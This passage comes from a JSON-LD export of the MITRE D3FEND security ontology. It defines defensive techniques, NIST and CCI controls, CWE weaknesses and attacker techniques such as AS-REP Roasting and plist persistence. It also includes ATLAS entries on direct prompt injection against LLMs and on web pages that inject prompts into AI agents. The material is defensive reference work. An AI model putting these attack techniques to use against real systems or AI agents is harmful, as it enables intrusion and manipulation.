      "d3f:definition": "Temporal difference (TD) learning refers to a class of model-free reinforcement learning methods which learn by bootstrapping from the current estimate of the value function. These methods sample from the environment, like Monte Carlo methods, and perform updates based on current estimates, like dynamic programming methods.",
      "d3f:kb-article": "## References\nTemporal difference learning. Wikipedia.  [Link](https://en.wikipedia.org/wiki/Temporal_difference_learning).",
      "rdfs:comment": "Temporal difference (TD) learning refers to a class of model-free reinforcement learning methods which learn by bootstrapping from the current estimate of the value function.",
      "rdfs:label": "Temporal Difference Learning",
      "rdfs:subClassOf": {
        "@id": "d3f:Model-freeReinforcementLearning"
      }
    },
    {
      "@id": "d3f:AML.T0051.000",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0051.000",
      "d3f:definition": "An adversary may inject prompts directly as a user of the LLM. This type of injection may be used by the adversary to gain a foothold in the system or to misuse the LLM itself, for example to generate harmful content.",
      "rdfs:label": "Direct - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0051.000"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0051"
      },
      "skos:prefLabel": "Direct"
    },
    {
      "@id": "d3f:ResumeThread",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:resumes": {
        "@id": "d3f:Thread"
      },
      "rdfs:label": "Resume Thread",
      "rdfs:seeAlso": {
        "@id": "https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-resumethread"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemCall"
        },
        {
          "@id": "_:N43cfd38702604ea88ec06cbed3137d24"
        }
      ]
    },
    {
      "@id": "_:N43cfd38702604ea88ec06cbed3137d24",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:resumes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Thread"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-4_28",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Information Flow Enforcement | Linear Filter Pipelines",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "rdfs:label": "AC-4(28)"
    },
    {
      "@id": "d3f:Reference-NIST-SP800-116r1",
      "@type": [
        "owl:NamedIndividual",
        "d3f:GuidelineReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-116r1.pdf"
      },
      "d3f:kb-abstract": "This recommendation provides a technical guideline to use Personal Identity Verification (PIV) Cards in facility access; enabling federal agencies to operate as government-wide interoperable enterprises. These guidelines cover the risk-based strategy to select appropriate PIV authentication mechanisms as expressed within Federal Information Processing Standard (FIPS) 201.",
      "d3f:kb-author": "NIST",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:ElectronicLockMonitoring"
        },
        {
          "@id": "d3f:ProximitySensorMonitoring"
        }
      ],
      "d3f:kb-reference-title": "Guidelines for the Use of PIV Credentials in Facility Access",
      "rdfs:label": "Reference - NIST SP 800-116 Rev. 1"
    },
    {
      "@id": "d3f:CCI-002290_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:UserAccountPermissions"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system supports the association of organization-defined security attributes with organization-defined objects by authorized individuals (or processes acting on behalf of individuals).",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-06-24T00:00:00"
      },
      "rdfs:label": "CCI-002290"
    },
    {
      "@id": "d3f:ApplicationExceptionMonitoring",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ApplicationExceptionMonitoring"
      ],
      "d3f:d3fend-id": "D3-AEM",
      "d3f:definition": "Monitoring the failures of system counters and timers.",
      "d3f:kb-article": "## How it works\nMonitoring timer and counter failures or exceedances can reveal issues with the program or platform, and is important for both safety and security. It may also help identify tampering or malicious activity affecting the device or the processes it controls.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-SecurePLCCodingPracticesTop20List"
      },
      "d3f:monitors": [
        {
          "@id": "d3f:ApplicationFailureCountVariable"
        },
        {
          "@id": "d3f:Log"
        }
      ],
      "d3f:synonym": "Application Failure Monitoring",
      "rdfs:label": "Application Exception Monitoring",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ApplicationPerformanceMonitoring"
        },
        {
          "@id": "_:Nc793035088a74893ae2f521201f0cbc8"
        },
        {
          "@id": "_:N2f74786af1bd49b9b8ebba2638e9540e"
        }
      ]
    },
    {
      "@id": "_:Nc793035088a74893ae2f521201f0cbc8",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:monitors"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ApplicationFailureCountVariable"
      }
    },
    {
      "@id": "_:N2f74786af1bd49b9b8ebba2638e9540e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:monitors"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Log"
      }
    },
    {
      "@id": "d3f:T1558.004",
      "@type": "owl:Class",
      "d3f:attack-id": "T1558.004",
      "d3f:definition": "Adversaries may reveal credentials of accounts that have disabled Kerberos preauthentication by [Password Cracking](https://attack.mitre.org/techniques/T1110/002) Kerberos messages.(Citation: Harmj0y Roasting AS-REPs Jan 2017)",
      "rdfs:label": "AS-REP Roasting",
      "rdfs:subClassOf": {
        "@id": "d3f:T1558"
      }
    },
    {
      "@id": "d3f:extends",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x extends y: The entity x extends the scope or range or area of entity y, especially in the sense of widening the range of applications.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/00541315-v"
      },
      "rdfs:label": "extends",
      "rdfs:subPropertyOf": {
        "@id": "d3f:modifies"
      }
    },
    {
      "@id": "d3f:Certificate-basedAuthentication",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:Certificate-basedAuthentication"
      ],
      "d3f:d3fend-id": "D3-CBAN",
      "d3f:definition": "Requiring a digital certificate in order to authenticate a user.",
      "d3f:kb-article": "## How it works\n\nCertificate-based authentication is a security mechanism that uses digital certificates to verify the identity of a user, device, or server before granting access to a network or system. This method relies on a pair of cryptographic keys: a public key and a private key.\n\n## Considerations\n\n* Private Key Protection: Ensure that private keys are securely stored and protected against unauthorized access.\n* Certificate Revocation: Implement a robust process for revoking certificates if they are compromised or no longer needed.\n* Man-in-the-Middle Attacks: Use mutual authentication to mitigate the risk of these attacks.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-FederalPublicKeyInfrastructure101"
      },
      "d3f:reads": {
        "@id": "d3f:Certificate"
      },
      "rdfs:label": "Certificate-based Authentication",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:AgentAuthentication"
        },
        {
          "@id": "_:Na1e864ac90674d30908d837aedf89590"
        }
      ]
    },
    {
      "@id": "_:Na1e864ac90674d30908d837aedf89590",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:reads"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Certificate"
      }
    },
    {
      "@id": "d3f:AML.T0078",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0078",
      "d3f:definition": "Adversaries may gain access to an AI system through a user visiting a website over the normal course of browsing, or an AI agent retrieving information from the web on behalf of a user. Websites can contain an [LLM Prompt Injection](/techniques/AML.T0051) which, when executed, can change the behavior of the AI model.\n\nThe same approach may be used to deliver other types of malicious code that don't target AI directly (See [Drive-by Compromise in ATT&CK](https://attack.mitre.org/techniques/T1189/)).",
      "rdfs:label": "Drive-by Compromise - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0078"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASInitialAccessTechnique"
      },
      "skos:prefLabel": "Drive-by Compromise"
    },
    {
      "@id": "d3f:AML.T0050",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0050",
      "d3f:definition": "Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell.\n\nThere are also cross-platform interpreters such as Python, as well as those commonly associated with client applications such as JavaScript and Visual Basic.\n\nAdversaries may abuse these technologies in various ways as a means of executing arbitrary commands. Commands and scripts can be embedded in Initial Access payloads delivered to victims as lure documents or as secondary payloads downloaded from an existing C2. Adversaries may also execute commands through interactive terminals/shells, as well as utilize various Remote Services in order to achieve remote Execution.",
      "rdfs:label": "Command and Scripting Interpreter - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0050"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASExecutionTechnique"
      },
      "skos:prefLabel": "Command and Scripting Interpreter"
    },
    {
      "@id": "d3f:FileMountEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a file system or storage volume is mounted, making its files and directories accessible to the operating system or applications.",
      "rdfs:label": "File Mount Event",
      "rdfs:subClassOf": {
        "@id": "d3f:FileEvent"
      }
    },
    {
      "@id": "d3f:Transponder",
      "@type": "owl:Class",
      "d3f:definition": "In telecommunications, a transponder is a device that, upon receiving a signal, emits a different signal in response.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Transponder"
      },
      "rdfs:label": "Transponder",
      "rdfs:subClassOf": {
        "@id": "d3f:HardwareDevice"
      }
    },
    {
      "@id": "d3f:T1211",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1211",
      "d3f:definition": "Adversaries may exploit a system or application vulnerability to bypass security features. Exploitation of a vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Vulnerabilities may exist in defensive security software that can be used to disable or circumvent them.",
      "d3f:may-modify": [
        {
          "@id": "d3f:ProcessCodeSegment"
        },
        {
          "@id": "d3f:StackFrame"
        }
      ],
      "rdfs:label": "Exploitation for Defense Evasion",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "_:N639d30b66b524d4488efa235251727d5"
        },
        {
          "@id": "_:N5c5cc3ddafae430f99b1d6eb53141c37"
        }
      ]
    },
    {
      "@id": "_:N639d30b66b524d4488efa235251727d5",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ProcessCodeSegment"
      }
    },
    {
      "@id": "_:N5c5cc3ddafae430f99b1d6eb53141c37",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:StackFrame"
      }
    },
    {
      "@id": "d3f:ATTACKMobilePersistenceTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:TA0028"
      },
      "rdfs:label": "Persistence Technique - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileTechnique"
        },
        {
          "@id": "_:N86c82cdc900d4efa8776dec122269c8f"
        }
      ],
      "skos:prefLabel": "Persistence Technique"
    },
    {
      "@id": "_:N86c82cdc900d4efa8776dec122269c8f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TA0028"
      }
    },
    {
      "@id": "d3f:CWE-762",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-762",
      "d3f:definition": "The product attempts to return a memory resource to the system, but it calls a release function that is not compatible with the function that was originally used to allocate that resource.",
      "rdfs:label": "Mismatched Memory Management Routines",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-763"
      }
    },
    {
      "@id": "d3f:CredentialRotation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:CredentialRotation"
      ],
      "d3f:d3fend-id": "D3-CRO",
      "d3f:definition": "Credential rotation is a security procedure in which authentication credentials, such as passwords, API keys, or certificates, are regularly changed or replaced to minimize the risk of unauthorized access.",
      "d3f:kb-article": "## How it works\n\nCredentials can be systematically changed at predetermined intervals or based on specific events. Credentials such as user passwords may be rotated manually, but it is increasingly common to use an automated system to manage rotation of enterprise passwords, certificates and keys.\n\n## Considerations\n\n- Rotation of credentials must be managed carefully to avoid inadvertent service interruption.\n- Management servers with enterprise policies for account management provide the ability to change or reset passwords for accounts. Some organizations rotate credentials periodically to limit the risk of stolen credentials.\n- When responding to an incident, the severity of the compromise should be considered to determine which credentials for which accounts should be regenerated.\n- If proactively rotating credentials periodically, several factors should be considered to determine the frequency. Periodic rotation also introduces some risk, including promoting the creation of weak passwords and poor storage practices by employees, and it presents challenges in proper tracking.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-PasswordandKeyRotation-SSH"
        },
        {
          "@id": "d3f:Reference-EvictionGuidanceforNetworksAffectedbytheSolarWindsandActiveDirectory/M365Compromise-CISA"
        }
      ],
      "d3f:regenerates": {
        "@id": "d3f:Credential"
      },
      "rdfs:label": "Credential Rotation",
      "rdfs:seeAlso": {
        "@id": "https://www.ituonline.com/tech-definitions/what-is-credential-rotation/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CredentialHardening"
        },
        {
          "@id": "_:N34ea37b054214b6eb087200ab785e085"
        }
      ]
    },
    {
      "@id": "_:N34ea37b054214b6eb087200ab785e085",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:regenerates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Credential"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_IA-2_6",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Identification and Authentication (organizational Users) | Access to Accounts —separate Device",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": {
        "@id": "d3f:Multi-factorAuthentication"
      },
      "rdfs:label": "IA-2(6)"
    },
    {
      "@id": "d3f:T1547.011",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1547.011",
      "d3f:definition": "Adversaries can modify property list files (plist files) to execute their code as part of establishing persistence. Plist files are used by macOS applications to store properties and configuration settings for applications and services. Applications use information plist files, <code>Info.plist</code>, to tell the operating system how to handle the application at runtime using structured metadata in the form of keys and values. Plist files are formatted in XML and based on Apple's Core Foundation DTD and can be saved in text or binary format.(Citation: fileinfo plist file description)",
      "d3f:modifies": {
        "@id": "d3f:ApplicationConfigurationFile"
      },
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1647",
      "rdfs:label": "Plist Modification",
      "rdfs:seeAlso": {
        "@id": "d3f:T1647"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1547"
        },
        {
          "@id": "_:N24542c08012c47d49b4f1241019e461a"
        }
      ]
    },
    {
      "@id": "_:N24542c08012c47d49b4f1241019e461a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ApplicationConfigurationFile"
      }
    },
    {
      "@id": "d3f:EX-0012.06",
      "@type": "owl:Class",
      "d3f:attack-id": "EX-0012.06",
      "d3f:definition": "Payload data, and the metadata that gives it meaning, can be altered in place to steal value, mislead users, or degrade mission outputs. Targets include raw detector frames, packetized Level-0 streams, onboard preprocessed products, and file catalogs/directories on mass memory. Adjacent metadata such as timestamps, pointing/attitude tags, calibration coefficients, compression settings, and quality flags are equally potent; slight bias in a calibration table or time tag can skew entire downlink campaigns while appearing routine. An adversary may rewrite frame headers, reorder packets, substitute segments from prior passes, or flip quality bits so ground pipelines silently discard or misclassify products. Recorder index manipulation can orphan files or cause downlinks to serve stale or fabricated content. Because many missions perform some processing or filtering onboard, tampering upstream of downlink propagates forward as “authoritative” truth, jeopardizing mission objectives without obvious protocol anomalies.",
      "rdfs:label": "Science/Payload Data - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0012/06/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:EX-0012"
      },
      "skos:prefLabel": "Science/Payload Data"
    },
    {
      "@id": "d3f:RandomSplits",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-RS",
      "d3f:definition": "The dataset is repeatedly sampled with a random split of the data into train and test sets.",
      "d3f:kb-article": "## References\nHow to Create a Random Split Cross-Validation and Bagging Ensemble for Deep Learning in Keras. *Machine Learning Mastery*. [Link](https://machinelearningmastery.com/how-to-create-a-random-split-cross-validation-and-bagging-ensemble-for-deep-learning-in-keras/).",
      "rdfs:label": "Random Splits",
      "rdfs:subClassOf": {
        "@id": "d3f:ResamplingEnsemble"
      }
    },
    {
      "@id": "d3f:OTProgramModeCommand",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Command that places the controller in a mode capable of reprogramming logic. This may or may not stop the program.",
      "d3f:modifies": {
        "@id": "d3f:OTControllerOperatingMode"
      },
      "rdfs:comment": [
        "BACnet: deviceCommunicationControl\nBACnet: reinitializeDevice ",
        "GE-SRTP: SET PLC (RUN VS STOP)"
      ],
      "rdfs:label": "OT Program Mode Command",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTModifyDeviceOperatingModeCommand"
        },
        {
          "@id": "_:Ncf163d608a4b40a1903cbd28bac50c6e"
        }
      ]
    },
    {
      "@id": "_:Ncf163d608a4b40a1903cbd28bac50c6e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTControllerOperatingMode"
      }
    },
    {
      "@id": "d3f:T1059.011",
      "@type": "owl:Class",
      "d3f:attack-id": "T1059.011",
      "d3f:definition": "Adversaries may abuse Lua commands and scripts for execution. Lua is a cross-platform scripting and programming language primarily designed for embedded use in applications. Lua can be executed on the command-line (through the stand-alone lua interpreter), via scripts (<code>.lua</code>), or from Lua-embedded programs (through the <code>struct lua_State</code>).(Citation: Lua main page)(Citation: Lua state)",
      "rdfs:label": "Lua",
      "rdfs:subClassOf": {
        "@id": "d3f:T1059"
      }
    },
    {
      "@id": "d3f:T1158",
      "@type": "owl:Class",
      "d3f:attack-id": "T1158",
      "d3f:definition": "To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (<code>dir /a</code> for Windows and <code>ls -a</code> for Linux and macOS).",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1564.001",
      "rdfs:label": "Hidden Files and Directories",
      "rdfs:seeAlso": {
        "@id": "d3f:T1564.001"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "d3f:PersistenceTechnique"
        }
      ]
    },
    {
      "@id": "d3f:CCI-002382_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:Hardware-basedProcessIsolation"
        },
        {
          "@id": "d3f:Kernel-basedProcessIsolation"
        }
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization implements security functions as largely independent modules that maximize internal cohesiveness within modules and minimize coupling between modules.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-02T00:00:00"
      },
      "rdfs:label": "CCI-002382"
    },
    {
      "@id": "d3f:IA-0009.02",
      "@type": "owl:Class",
      "d3f:attack-id": "IA-0009.02",
      "d3f:definition": "Vendors that design, integrate, or support mission systems often hold elevated, persistent routes into operations: remote administration of ground software and modems, access to identity providers and license servers, control of cloud-hosted services, and authority to deliver firmware, bitstreams, or patches. Attackers who compromise a vendor’s enterprise or build environment can assume these roles, issuing commands through approved consoles, queuing updates in provider-operated portals, or invoking maintenance procedures that the mission expects the vendor to perform. Some vendor pathways terminate directly on RF equipment or key-management infrastructure; others ride cross-account cloud roles or managed SaaS backends that handle mission data and scheduling.",
      "rdfs:label": "Vendor - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/IA-0009/02/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:IA-0009"
      },
      "skos:prefLabel": "Vendor"
    },
    {
      "@id": "d3f:ProcessDataSegment",
      "@type": "owl:Class",
      "d3f:definition": "A process data segment, is a portion of the program's virtual address space that contains executable instructions and corresponds to the loaded image data segment.",
      "rdfs:label": "Process Data Segment",
      "rdfs:seeAlso": [
        {
          "@id": "d3f:ImageDataSegment"
        },
        {
          "@id": "dbr:Data_segment"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:ProcessSegment"
      }
    },
    {
      "@id": "d3f:T1508",
      "@type": "owl:Class",
      "d3f:attack-id": "T1508",
      "d3f:definition": "A malicious application could suppress its icon from being displayed to the user in the application launcher to hide the fact that it is installed, and to make it more difficult for the user to uninstall the application. Hiding the application's icon programmatically does not require any special permissions.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1628.001",
      "rdfs:label": "Suppress Application Icon - ATTACK Mobile",
      "rdfs:seeAlso": {
        "@id": "d3f:T1628.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileDefenseEvasionTechnique"
      },
      "skos:prefLabel": "Suppress Application Icon"
    },
    {
      "@id": "d3f:OperationalRiskAssessment",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OperationalRiskAssessment"
      ],
      "d3f:d3fend-id": "D3-ORA",
      "d3f:definition": "Operational risk assessment identifies and models the vulnerabilities of, and risks to, an organization's activities individually and as a whole.",
      "d3f:evaluates": {
        "@id": "d3f:Organization"
      },
      "d3f:identifies": {
        "@id": "d3f:Vulnerability"
      },
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-MGT516ManagingSecurityVulnerabilitiesEnterpriseAndCloud"
        },
        {
          "@id": "d3f:Reference-NIST-RMF-Quick-Start-Guide-Assess-Step-FAQ"
        },
        {
          "@id": "d3f:Reference-NIST-Special-Publication-800-160-Volume-1"
        },
        {
          "@id": "d3f:Reference-NIST-Special-Publication-800-37-Revision-2"
        },
        {
          "@id": "d3f:Reference-NIST-Special-Publication-800-53A-Revision-5"
        },
        {
          "@id": "d3f:Reference-NISTIR-8011-Volume-1"
        }
      ],
      "d3f:synonym": "Mission Risk Assessment",
      "rdfs:label": "Operational Risk Assessment",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OperationalActivityMapping"
        },
        {
          "@id": "_:Naf40d2ffabe84681ae0664c39d4a78b4"
        },
        {
          "@id": "_:N4c5ec67b31124b70a78885719c48d9f5"
        }
      ]
    },
    {
      "@id": "_:Naf40d2ffabe84681ae0664c39d4a78b4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:evaluates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Organization"
      }
    },
    {
      "@id": "_:N4c5ec67b31124b70a78885719c48d9f5",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:identifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Vulnerability"
      }
    },
    {
      "@id": "d3f:Reference-SystemAndMethodsThereofForDetectionOfPersistentThreatsInAComputerizedEnvironmentBackground_PaloAltoNetworksIncCyberSecdoLtd",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20170206358A1/en?oq=US-2017206358-A1"
      },
      "d3f:kb-abstract": "A system is used for detection of advanced persistent and non-persistent threats in a computerized environment. The system is connected to a plurality of user devices coupled to an enterprise's network. The system receives via an interface an electronic notification of at least one event in the operating system of the computer. The system then analyzes the at least one event. The system then generates a causality chain for the at least one event respective of the analysis. The causality chain comprises all the threads that attributed to the at least one event in a chronological order. The system then identifies a main thread that started the causality chain that led to the at least one event. Then, the system determines whether the main thread is associated with malicious software. Upon determination that the main thread is associated with malicious software, the causality chain is marked as infected.",
      "d3f:kb-author": "Gil BARAK",
      "d3f:kb-mitre-analysis": "The patent describes detecting malicious events on a host. For each new event (e.x. new file request received from a user device, a change in an existing file in a container) a causality chain is developed for all threads associated with the event. The causality chain identifies the thread that started the process of the event (main thread). If a thread in the causality chain has no parent, i.e. no main thread associated with it, the process is identified as malicious.",
      "d3f:kb-organization": "Palo Alto Networks IncCyber Secdo Ltd",
      "d3f:kb-reference-title": "System and methods thereof for detection of persistent threats in a computerized environment background",
      "rdfs:label": "Reference - System and methods thereof for detection of persistent threats in a computerized environment background - Palo Alto Networks IncCyber Secdo Ltd"
    },
    {
      "@id": "d3f:CWE-121",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-121",
      "d3f:definition": "A stack-based buffer overflow condition is a condition where the buffer being overwritten is allocated on the stack (i.e., is a local variable or, rarely, a parameter to a function).",
      "d3f:synonym": "Stack Overflow",
      "rdfs:label": "Stack-based Buffer Overflow",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-787"
        },
        {
          "@id": "d3f:CWE-788"
        }
      ]
    },
    {
      "@id": "d3f:RuntimeVariable",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A runtime variable is an abstract storage location paired with an associated symbolic name, which contains some known or unknown quantity of data or object referred to as a value, which can change during the execution of a computer program.",
      "rdfs:label": "Runtime Variable",
      "rdfs:seeAlso": {
        "@id": "https://dbpedia.org/page/Variable_(computer_science)"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformationBearer"
      }
    },
    {
      "@id": "d3f:LocalFileAccessMediation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:LocalFileAccessMediation"
      ],
      "d3f:d3fend-id": "D3-LFAM",
      "d3f:definition": "Local file access mediation is the process of an operating system granting or denying a specific access request to a local file.",
      "d3f:filters": {
        "@id": "d3f:OpenFile"
      },
      "d3f:kb-reference": {
        "@id": "d3f:Reference-FileAndFolderPermissions"
      },
      "d3f:synonym": "Local File Access Control",
      "rdfs:comment": "Replaces d3-LFP",
      "rdfs:label": "Local File Access Mediation",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemCallFiltering"
        },
        {
          "@id": "_:N716ee160a8d7451493030d08d3eed509"
        }
      ]
    },
    {
      "@id": "_:N716ee160a8d7451493030d08d3eed509",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:filters"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OpenFile"
      }
    },
    {
      "@id": "d3f:GetThreadContext",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:queries": {
        "@id": "d3f:Thread"
      },
      "rdfs:label": "Get Thread Context",
      "rdfs:seeAlso": {
        "@id": "https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-getthreadcontext"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemCall"
        },
        {
          "@id": "_:N1c5f9f3a89e24377a044c7ded7fd3b04"
        }
      ]
    },
    {
      "@id": "_:N1c5f9f3a89e24377a044c7ded7fd3b04",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:queries"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Thread"
      }
    },
    {
      "@id": "d3f:T0873",
      "@type": "owl:Class",
      "d3f:attack-id": "T0873",
      "d3f:definition": "Adversaries may attempt to infect project files with malicious code. These project files may consist of objects, program organization units, variables such as tags, documentation, and other configurations needed for PLC programs to function. (Citation: Beckhoff) Using built in functions of the engineering software, adversaries may be able to download an infected program to a PLC in the operating environment enabling further [Execution](https://attack.mitre.org/tactics/TA0104) and [Persistence](https://attack.mitre.org/tactics/TA0110) techniques. (Citation: PLCdev)",
      "rdfs:label": "Project File Infection - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSPersistenceTechnique"
      },
      "skos:prefLabel": "Project File Infection"
    },
    {
      "@id": "d3f:UserInterface",
      "@type": "owl:Class",
      "d3f:definition": "The user interface (UI), in the industrial design field of human-machine interaction, is the space where interactions between humans and machines occur. The goal of this interaction is to allow effective operation and control of the machine from the human end, whilst the machine simultaneously feeds back information that aids the operators' decision-making process. Examples of this broad concept of user interfaces include the interactive aspects of computer operating systems, hand tools, heavy machinery operator controls, and process controls. The design considerations applicable when creating user interfaces are related to or involve such disciplines as ergonomics and psychology.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:User_interface"
      },
      "rdfs:label": "User Interface",
      "rdfs:subClassOf": {
